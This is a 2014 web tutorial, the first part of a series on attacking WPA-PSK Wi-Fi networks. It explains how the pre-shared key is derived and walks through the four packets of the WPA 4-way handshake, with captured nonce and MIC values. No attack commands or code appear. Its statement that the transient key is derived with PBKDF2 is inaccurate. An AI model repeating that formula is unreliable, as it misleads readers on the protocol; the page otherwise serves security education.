You are here: Home // Wi-Fi // WPA Attacks // Attacking WPA-PSK - Part 1 A A A

Home Intelligence Gathering Wi-Fi Vulnerable by Design Misc Contact

Search...

MostRead in Wi-Fi

Attacking WPA-PSK

Without Wireless

Clients

WPA2-PSK Evil Twin

Attack

WPA2-PSK Rainbow

Table Attack

Wi-Fi Protected Setup

KoreK's ChopChop

Attack - Part 1

Attacking WPA-PSK - Part 1

Details

Category: WPA/2

Published on Saturday, 18 January 2014 13:57

Introduction

The process of a wireless client authenticating and joining a WPA protected

network, is much more complex than it was for WEP. WPA packets are

encrypted with dynamic keys, which are established during the authentication

process (and then changed at regular intervals), but they are derived from a

master key held by both parties. This key is called the Pre-Shared Key (PSK)

or Pairwise Master Key (PMK).

Pre-Shared Key

The PSK is a 256-bit key which is derived using the Password Based Key

Derivation Function (PBKDF2), documented under RFC 2898. The PBKDF2 is

a SHA1 based function which takes several inputs.

PSK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)

where:

4096 is the number of times the function is performed

256 is the size of the final key

The 4-Way Handshake

The purpose of this handshake phase is to derive the Pairwise Transient Key

(PTK), which is the temporary encryption key used to encrypt data; and to

confirm the identity of the wireless client (i.e. do they have the correct

passphrase to join).

Packet 1

Key Descriptor Version: RC4 Cipher, HMAC-MD5 MIC (1)

Key Type: Pairwise Key

The two lines above are two examples that confirm the access point is using

WPA TKIP, as the RC4 cipher is mentioned.

Replay Counter: 0

The replay counter is set to a value n, it may not always be 0 as in this case,

but is used by the access point and client to track concurrent handshake

packets.

Install: Not set

Key MIC: Not set

Note that the Install and Key MIC fields are not yet set. The value in the field

below is the ANonce, as it is generated and sent by the access point.

WPA Key Nonce: f7449f4ffb86488e5e23961b6eeb8625d3c0b11a5da73fe7...

Packet 2

Install: Not set

Key MIC: SetReplay Counter: 0

This is the SNonce, as it is generated and sent by the client. Using the

ANonce, SNonce and other information (see below) the client has already

generated the PTK, calculated the MIC and included it in this packet.

WPA Key Nonce:

2fac8f76e7794763726ccbdb00ef275e97417b91b2e16a13...

WPA Key MIC: 8f4aeb8b937b5f48b1a9c741b382f61c

Packet 3

Install: Set

Key ACK: Set

The access point checks the MIC sent by the client in Packet 2 by using the

same information. It sends a reply with the Install and Key ACK fields set -

this instructs the client that the PSK (and thus Passphrase) it's using is

correct and that it can continue to use it for communication.

Replay Counter: 1

The Replay Counter is increased by 1.

Key MIC: Set

WPA Key MIC: 5ec94d0a78b6a929501149624b9fa0b0

Copyright © 2014 - Material is for educational purposes only

JC omments

< Prev Next >

Packet 4

Replay Counter: 1

To indicate that this is the last packet in the handshake, the Key ACK bit is set

back to 0.

Key ACK: Not set

WPA Key MIC: f3e29f4334b9f4ee8f999ec1823281e8

Pairwise Transient Key

This is the key used to encrypt data whilst it is in transit, it's derived using the

PBKDF2 function.

PTK = PBKDF2(PSK, ANonce, SNonce, AMAC, SMAC)

where:

AMAC is the MAC address of the Access Point

SMAC is the MAC address of the client (supplicant)

Add comment